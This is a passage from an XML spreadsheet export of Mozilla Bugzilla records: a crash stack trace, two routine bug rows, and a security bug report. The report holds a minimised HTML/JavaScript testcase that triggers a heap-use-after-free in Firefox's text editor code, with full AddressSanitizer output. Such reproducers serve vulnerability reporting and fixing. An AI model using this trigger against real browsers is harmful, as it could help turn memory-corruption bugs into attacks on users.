js_EmitTree(JSContext * 0x000003cf, JSCodeGenerator * 0x00000000, JSParseNode * 
0x034fe750) line 1056 + 10 bytes
js_EmitTree(JSContext * 0x022e56b0, JSCodeGenerator * 0x00000000, JSParseNode * 
0x034fe720) line 2135 + 8 bytes
js_EmitTree(JSContext * 0x00000375, JSCodeGenerator * 0x034fe6f0, JSParseNode * 
0x034fe510) line 1630 + 10 bytes
js_EmitTree(JSContext * 0x022e56b0, JSCodeGenerator * 0x00000000, JSParseNode * 
0x023594f0) line 2135 + 8 bytes
js_EmitFunctionBody(JSContext * 0x022e56b0, JSCodeGenerator * 0x0012f078, 
JSParseNode * 0x023594f0, JSFunction * 0x03496110) line 850 + 12 bytes
js_EmitTree(JSContext * 0x03496110, JSCodeGenerator * 0x023594f0, JSParseNode * 
0x023594c0) line 930 + 20 bytes
Statements(JSContext * 0x00000001, JSTokenStream * 0x023594c0, JSTreeContext * 
0x0012f218) line 911 + 42 bytes
js_CompileTokenStream(JSContext * 0x00000000, JSObject * 0x02291a20, 
JSTokenStream * 0x02359148, JSCodeGenerator * 0x0012f218) line 391 + 13 bytes
CompileTokenStream(JSContext * 0x022e56b0, JSObject * 0x02291a20, JSTokenStream 
* 0x02359148, void * 0x022e5730, int * 0x00000000) line 2784 + 19 bytes
JS_CompileUCScriptForPrincipals(JSContext * 0x022e56b0, JSObject * 0x02291a20, 
JSPrincipals * 0x034b7ea0, const unsigned short * 0x0350ce00, unsigned int 
17577, const char * 0x034bea78, unsigned int 3) line 2863 + 13 bytes
JS_EvaluateUCScriptForPrincipals(JSContext * 0x022e56b0, JSObject * 0x02291a20, 
JSPrincipals * 0x034b7ea0, const unsigned short * 0x0350ce00, unsigned int 
17577, const char * 0x034bea78, unsigned int 3, long * 0x0012f33c) line 3270 + 
27 bytes
nsJSContext::EvaluateString(nsJSContext * const 0x00000000, const nsAString &amp; 
{...}, void * 0x02291a20, nsIPrincipal * 0x00000000, const char * 0x034bea78, 
unsigned int 3, const char * 0x00e12284 `string', nsAString &amp; {...}, int * 
0x0012f428) line 608 + 56 bytes
nsScriptLoader::EvaluateScript(nsScriptLoader * const 0xffff8174, 
nsScriptLoadRequest * 0x03447bf0, const nsAFlatString &amp; {...}) line 565
nsScriptLoader::ProcessRequest(nsScriptLoader * const 0xffff8174, 
nsScriptLoadRequest * 0x03447bf0) line 477 + 9 bytes
nsScriptLoader::ProcessScriptElement(nsScriptLoader * const 0x00000000, 
nsIDOMHTMLScriptElement * 0x034b7da4, nsIScriptLoaderObserver * 0x034bb204) 
line 420 + 11 bytes
nsHTMLScriptElement::SetDocument(nsHTMLScriptElement * const 0x034bb1d8, 
nsIDocument * 0x03494bc0, int 0, int 55278960) line 143 + 31 bytes
...</t>
        </is>
      </c>
      <c r="X2114" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2115">
      <c r="A2115" t="n">
        <v>846415</v>
      </c>
      <c r="B2115" t="inlineStr">
        <is>
          <t>2013-02-28 11:21:35 -0800</t>
        </is>
      </c>
      <c r="C2115" t="inlineStr">
        <is>
          <t>Remove rev2 machines from our configs</t>
        </is>
      </c>
      <c r="D2115" t="inlineStr">
        <is>
          <t>2018-05-08 15:19:48 -0700</t>
        </is>
      </c>
      <c r="E2115" t="n">
        <v>1</v>
      </c>
      <c r="F2115" t="n">
        <v>1</v>
      </c>
      <c r="G2115" t="n">
        <v>5</v>
      </c>
      <c r="H2115" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2115" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2115" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2115" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2115" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2115" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2115" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2115" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2115" t="inlineStr"/>
      <c r="Q2115" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2115" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2115" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2115" t="n">
        <v>1</v>
      </c>
      <c r="U2115" t="n">
        <v>0</v>
      </c>
      <c r="V2115" t="n">
        <v>6</v>
      </c>
      <c r="W2115" t="inlineStr">
        <is>
          <t>Because we don't need them anymore and can't reuse them for anything else.</t>
        </is>
      </c>
      <c r="X2115" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2116">
      <c r="A2116" t="n">
        <v>469068</v>
      </c>
      <c r="B2116" t="inlineStr">
        <is>
          <t>2008-12-10 20:50:43 -0800</t>
        </is>
      </c>
      <c r="C2116" t="inlineStr">
        <is>
          <t>SMTP parameters not documented</t>
        </is>
      </c>
      <c r="D2116" t="inlineStr">
        <is>
          <t>2012-01-21 03:09:33 -0800</t>
        </is>
      </c>
      <c r="E2116" t="n">
        <v>1</v>
      </c>
      <c r="F2116" t="n">
        <v>1</v>
      </c>
      <c r="G2116" t="n">
        <v>4</v>
      </c>
      <c r="H2116" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2116" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2116" t="inlineStr">
        <is>
          <t>Documentation</t>
        </is>
      </c>
      <c r="K2116" t="inlineStr">
        <is>
          <t>3.2</t>
        </is>
      </c>
      <c r="L2116" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2116" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2116" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2116" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2116" t="inlineStr"/>
      <c r="Q2116" t="inlineStr">
        <is>
          <t>P4</t>
        </is>
      </c>
      <c r="R2116" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2116" t="inlineStr">
        <is>
          <t>Bugzilla 3.4</t>
        </is>
      </c>
      <c r="T2116" t="n">
        <v>1</v>
      </c>
      <c r="U2116" t="n">
        <v>0</v>
      </c>
      <c r="V2116" t="n">
        <v>6</v>
      </c>
      <c r="W2116" t="inlineStr">
        <is>
          <t>http://bugzilla.glob.com.au/irc/?a=date&amp;h=smtpserver&amp;s=Dec+11+2008&amp;e=Dec+11+2008
Most obvious SMTP configuration parameters are not mentioned in Bugzilla Guideall</t>
        </is>
      </c>
      <c r="X2116" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2117">
      <c r="A2117" t="n">
        <v>1431336</v>
      </c>
      <c r="B2117" t="inlineStr">
        <is>
          <t>2018-01-18 01:22:28 -0800</t>
        </is>
      </c>
      <c r="C2117" t="inlineStr">
        <is>
          <t>heap-use-after-free in nsTextEditorState::SetSelectionRange</t>
        </is>
      </c>
      <c r="D2117" t="inlineStr">
        <is>
          <t>2024-05-30 09:41:57 -0700</t>
        </is>
      </c>
      <c r="E2117" t="n">
        <v>1</v>
      </c>
      <c r="F2117" t="n">
        <v>1</v>
      </c>
      <c r="G2117" t="n">
        <v>3</v>
      </c>
      <c r="H2117" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2117" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2117" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K2117" t="inlineStr">
        <is>
          <t>59 Branch</t>
        </is>
      </c>
      <c r="L2117" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2117" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2117" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2117" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2117" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main59+]</t>
        </is>
      </c>
      <c r="Q2117" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2117" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2117" t="inlineStr">
        <is>
          <t>mozilla60</t>
        </is>
      </c>
      <c r="T2117" t="n">
        <v>1</v>
      </c>
      <c r="U2117" t="n">
        <v>0</v>
      </c>
      <c r="V2117" t="n">
        <v>25</v>
      </c>
      <c r="W2117" t="inlineStr">
        <is>
          <t>Created attachment 8943525
crash.html (minimised testcase)
The following testcase crashes the latest ASAN build of Firefox 59.0a1 (SourceStamp=b7a651281314d6369658eeb58e3bb181cf95016f). It requires the fuzzPriv extension.
&lt;script&gt;
function start() {
	o15=document.createElement('input');
	o15.setRangeText(undefined+"");
	document.documentElement.onselect=fun0;
	document.documentElement.onselectstart=fun1;
	document.documentElement.appendChild(o15);
	window.setTimeout("tmp()",100);
	window.setTimeout("location.reload()", 400);
}
function tmp() {
	o15.select();
}
function fun0() {
	o15.setSelectionRange(1,-13);
	fuzzPriv.trustedKeyEvent(document.documentElement,'press',false,false,true,false,37,0);
}
function fun1() {
	o212=o15.cloneNode(false);
	o212.type='number';
	o15.type='hidden';
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==31055==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c0002788e8 at pc 0x7f83ddca5375 bp 0x7ffc74832330 sp 0x7ffc74832328
READ of size 8 at 0x60c0002788e8 thread T0 (file:// Content)
    #0 0x7f83ddca5374 in nsTextEditorState::SetSelectionRange(unsigned int, unsigned int, nsITextControlFrame::SelectionDirection, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/html/nsTextEditorState.cpp:1799:10
    #1 0x7f83dd0f4e6f in mozilla::dom::HTMLInputElementBinding::setSelectionRange(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::HTMLInputElement*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLInputElementBinding.cpp:3511:9
    #2 0x7f83dd3aed87 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3036:13
    #3 0x7f83e3df6a34 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #4 0x7f83e3df6a34 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
    #5 0x7f83e3de1a66 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
    #6 0x7f83e3de1a66 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3096
    #7 0x7f83e3dc8410 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
    #8 0x7f83e3df6f6c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
    #9 0x7f83e3df7a92 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
    #10 0x7f83e48dda6c in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:3029:12
    #11 0x7f83dccfe65e in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #12 0x7f83dd8a293a in Call&lt;nsISupports *&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #13 0x7f83dd8a293a in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #14 0x7f83dd869121 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1111:51
    #15 0x7f83dd86b032 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1286:20
    #16 0x7f83dd854a33 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:520:14
    #17 0x7f83dd8581b8 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:865:9
    #18 0x7f83dfc8150f in mozilla::PresShell::DispatchEventToDOM(mozilla::WidgetEvent*, nsEventStatus*, nsPresShellEventCB*) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:7992:7
    #19 0x7f83dfc7dbe9 in mozilla::PresShell::HandleEventInternal(mozilla::WidgetEvent*, nsEventStatus*, bool) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:7786:11
    #20 0x7f83dfc7c6f0 in mozilla::PresShell::HandleEventWithTarget(mozilla::WidgetEvent*, nsIFrame*, nsIContent*, nsEventStatus*, bool, nsIContent**) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:7573:17
    #21 0x7f83ddc99276 in nsTextInputListener::NotifySelectionChanged(nsIDOMDocument*, nsISelection*, short) /builds/worker/workspace/build/src/dom/html/nsTextEditorState.cpp:927:22
    #22 0x7f83db2626b5 in mozilla::dom::Selection::NotifySelectionListeners() /builds/worker/workspace/build/src/dom/base/Selection.cpp:3840:15
    #23 0x7f83dff9cc04 in nsFrameSelection::NotifySelectionListeners(mozilla::SelectionType) /builds/worker/workspace/build/src/layout/generic/nsFrameSelection.cpp:2022:23
    #24 0x7f83db25aba2 in mozilla::dom::Selection::Extend(nsINode&amp;, unsigned int, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/base/Selection.cpp:3206:25
    #25 0x7f83db259a62 in mozilla::dom::Selection::Extend(nsINode*, int) /builds/worker/workspace/build/src/dom/base/Selection.cpp:2921:3
    #26 0x7f83dff96021 in nsFrameSelection::TakeFocus(nsIContent*, unsigned int, unsigned int, mozilla::CaretAssociationHint, bool, bool) /builds/worker/workspace/build/src/layout/generic/nsFrameSelection.cpp
    #27 0x7f83dff92982 in nsFrameSelection::MoveCaret(nsDirection, bool, nsSelectionAmount, nsFrameSelection::CaretMovementStyle) /builds/worker/workspace/build/src/layout/generic/nsFrameSelection.cpp:910:14
    #28 0x7f83dff9dd49 in nsFrameSelection::PhysicalMove(short, short, bool) /builds/worker/workspace/build/src/layout/generic/nsFrameSelection.cpp:1892:17
    #29 0x7f83ddc96675 in nsTextInputSelectionImpl::PhysicalMove(short, short, bool) /builds/worker/workspace/build/src/dom/html/nsTextEditorState.cpp:565:28
    #30 0x7f83df5e6b3e in mozilla::SelectionMoveCommands::DoCommand(char const*, nsISupports*) /builds/worker/workspace/build/src/editor/libeditor/EditorCommands.cpp
    #31 0x7f83dd73ed60 in nsControllerCommandTable::DoCommand(char const*, nsISupports*) /builds/worker/workspace/build/src/dom/commandhandler/nsControllerCommandTable.cpp:147:26
    #32 0x7f83dd734a26 in nsBaseCommandController::DoCommand(char const*) /builds/worker/workspace/build/src/dom/commandhandler/nsBaseCommandController.cpp:136:25
    #33 0x7f83df00182c in nsXBLPrototypeHandler::DispatchXBLCommand(mozilla::dom::EventTarget*, nsIDOMEvent*) /builds/worker/workspace/build/src/dom/xbl/nsXBLPrototypeHandler.cpp:568:17
    #34 0x7f83defd42de in nsXBLPrototypeHandler::ExecuteHandler(mozilla::dom::EventTarget*, nsIDOMEvent*) /builds/worker/workspace/build/src/dom/xbl/nsXBLPrototypeHandler.cpp:285:12
    #35 0x7f83df01f1ed in nsXBLWindowKeyHandler::WalkHandlersAndExecute(nsIDOMKeyEvent*, nsAtom*, nsXBLPrototypeHandler*, unsigned int, mozilla::IgnoreModifierState const&amp;, bool, bool*) /builds/worker/workspace/build/src/dom/xbl/nsXBLWindowKeyHandler.cpp:793:28
    #36 0x7f83df018d86 in nsXBLWindowKeyHandler::WalkHandlersInternal(nsIDOMKeyEvent*, nsAtom*, nsXBLPrototypeHandler*, bool, bool*) /builds/worker/workspace/build/src/dom/xbl/nsXBLWindowKeyHandler.cpp:647:12
    #37 0x7f83df01875e in nsXBLWindowKeyHandler::WalkHandlers(nsIDOMKeyEvent*, nsAtom*) /builds/worker/workspace/build/src/dom/xbl/nsXBLWindowKeyHandler.cpp:303:3
    #38 0x7f83df01e034 in nsXBLWindowKeyHandler::HandleEvent(nsIDOMEvent*) /builds/worker/workspace/build/src/dom/xbl/nsXBLWindowKeyHandler.cpp:527:10
    #39 0x7f83dd869121 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1111:51
    #40 0x7f83dd86b032 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1286:20
    #41 0x7f83dd854a33 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:520:14
    #42 0x7f83dd854dc6 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:549:5
    #43 0x7f83dd8581b8 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:865:9
    #44 0x7f83dd85a0cc in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:932:12
    #45 0x7f83db49a3bf in nsINode::DispatchEvent(nsIDOMEvent*, bool*) /builds/worker/workspace/build/src/dom/base/nsINode.cpp:1359:5
    #46 0x7f83dd878571 in mozilla::dom::EventTarget::DispatchEvent(mozilla::dom::Event&amp;, mozilla::dom::CallerType, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/events/EventTarget.cpp:102:9
    #47 0x7f83dcdf8043 in mozilla::dom::EventTargetBinding::dispatchEvent(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::EventTarget*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventTargetBinding.cpp:981:21
    #48 0x7f83dcdf54a6 in mozilla::dom::EventTargetBinding::genericMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventTargetBinding.cpp:1157:13
    #49 0x7f83e3df6a34 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #50 0x7f83e3df6a34 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
    #51 0x7f83e3de1a66 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
    #52 0x7f83e3de1a66 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3096
    #53 0x7f83e3dc8410 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
    #54 0x7f83e3df6f6c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
    #55 0x7f83e3df7a92 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
    #56 0x7f83e48db5f1 in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2970:12
    #57 0x7f83d9b49302 in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:315:18
    #58 0x7f83e3df6a34 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #59 0x7f83e3df6a34 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
    #60 0x7f83e3de1a66 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
    #61 0x7f83e3de1a66 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3096
    #62 0x7f83e3dc8410 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
    #63 0x7f83e3df6f6c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
    #64 0x7f83e3df7a92 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
    #65 0x7f83e48dda6c in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:3029:12
    #66 0x7f83dccfe65e in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #67 0x7f83dd8a293a in Call&lt;nsISupports *&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #68 0x7f83dd8a293a in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #69 0x7f83dd869121 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1111:51
    #70 0x7f83dd86b032 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1286:20
    #71 0x7f83dd854a33 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:520:14
    #72 0x7f83dd8581b8 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:865:9
    #73 0x7f83dd85a0cc in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:932:12
    #74 0x7f83db49a3bf in nsINode::DispatchEvent(nsIDOMEvent*, bool*) /builds/worker/workspace/build/src/dom/base/nsINode.cpp:1359:5
    #75 0x7f83dd7e1b33 in mozilla::AsyncEventDispatcher::Run() /builds/worker/workspace/build/src/dom/events/AsyncEventDispatcher.cpp:70:12
    #76 0x7f83d821ca70 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:395:25
    #77 0x7f83d8244c5d in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1040:14
    #78 0x7f83d825fa30 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:517:10
    #79 0x7f83d90ea83a in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #80 0x7f83d9042139 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #81 0x7f83d9042139 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #82 0x7f83d9042139 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #83 0x7f83df463dea in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:157:27
    #84 0x7f83e3b1fedb in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:874:22
    #85 0x7f83d9042139 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #86 0x7f83d9042139 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #87 0x7f83d9042139 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #88 0x7f83e3b1f8c1 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:700:34
    #89 0x4ee915 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:63:30
    #90 0x4ee915 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #91 0x7f83f701382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #92 0x41dfe8 in _start (/fuzzer3/firefox/firefox+0x41dfe8)
0x60c0002788e8 is located 40 bytes inside of 128-byte region [0x60c0002788c0,0x60c000278940)
freed by thread T0 (file:// Content) here:
    #0 0x4be9f2 in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:68:3
    #1 0x7f83ddad7317 in operator delete /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:183:12
    #2 0x7f83ddad7317 in ReleaseTextEditorState /builds/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:1106
    #3 0x7f83ddad7317 in mozilla::dom::HTMLInputElement::FreeData() /builds/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:1195
    #4 0x7f83ddadef49 in mozilla::dom::HTMLInputElement::HandleTypeChange(unsigned char, bool) /builds/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:4951:3
    #5 0x7f83ddadc255 in mozilla::dom::HTMLInputElement::AfterSetAttr(int, nsAtom*, nsAttrValue const*, nsAttrValue const*, nsIPrincipal*, bool) /builds/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:1431:9
    #6 0x7f83db198193 in mozilla::dom::Element::SetAttrAndNotify(int, nsAtom*, nsAtom*, nsAttrValue const*, nsAttrValue&amp;, nsIPrincipal*, unsigned char, bool, bool, bool, nsIDocument*, mozAutoDocUpdate const&amp;) /builds/worker/workspace/build/src/dom/base/Element.cpp:2773:10
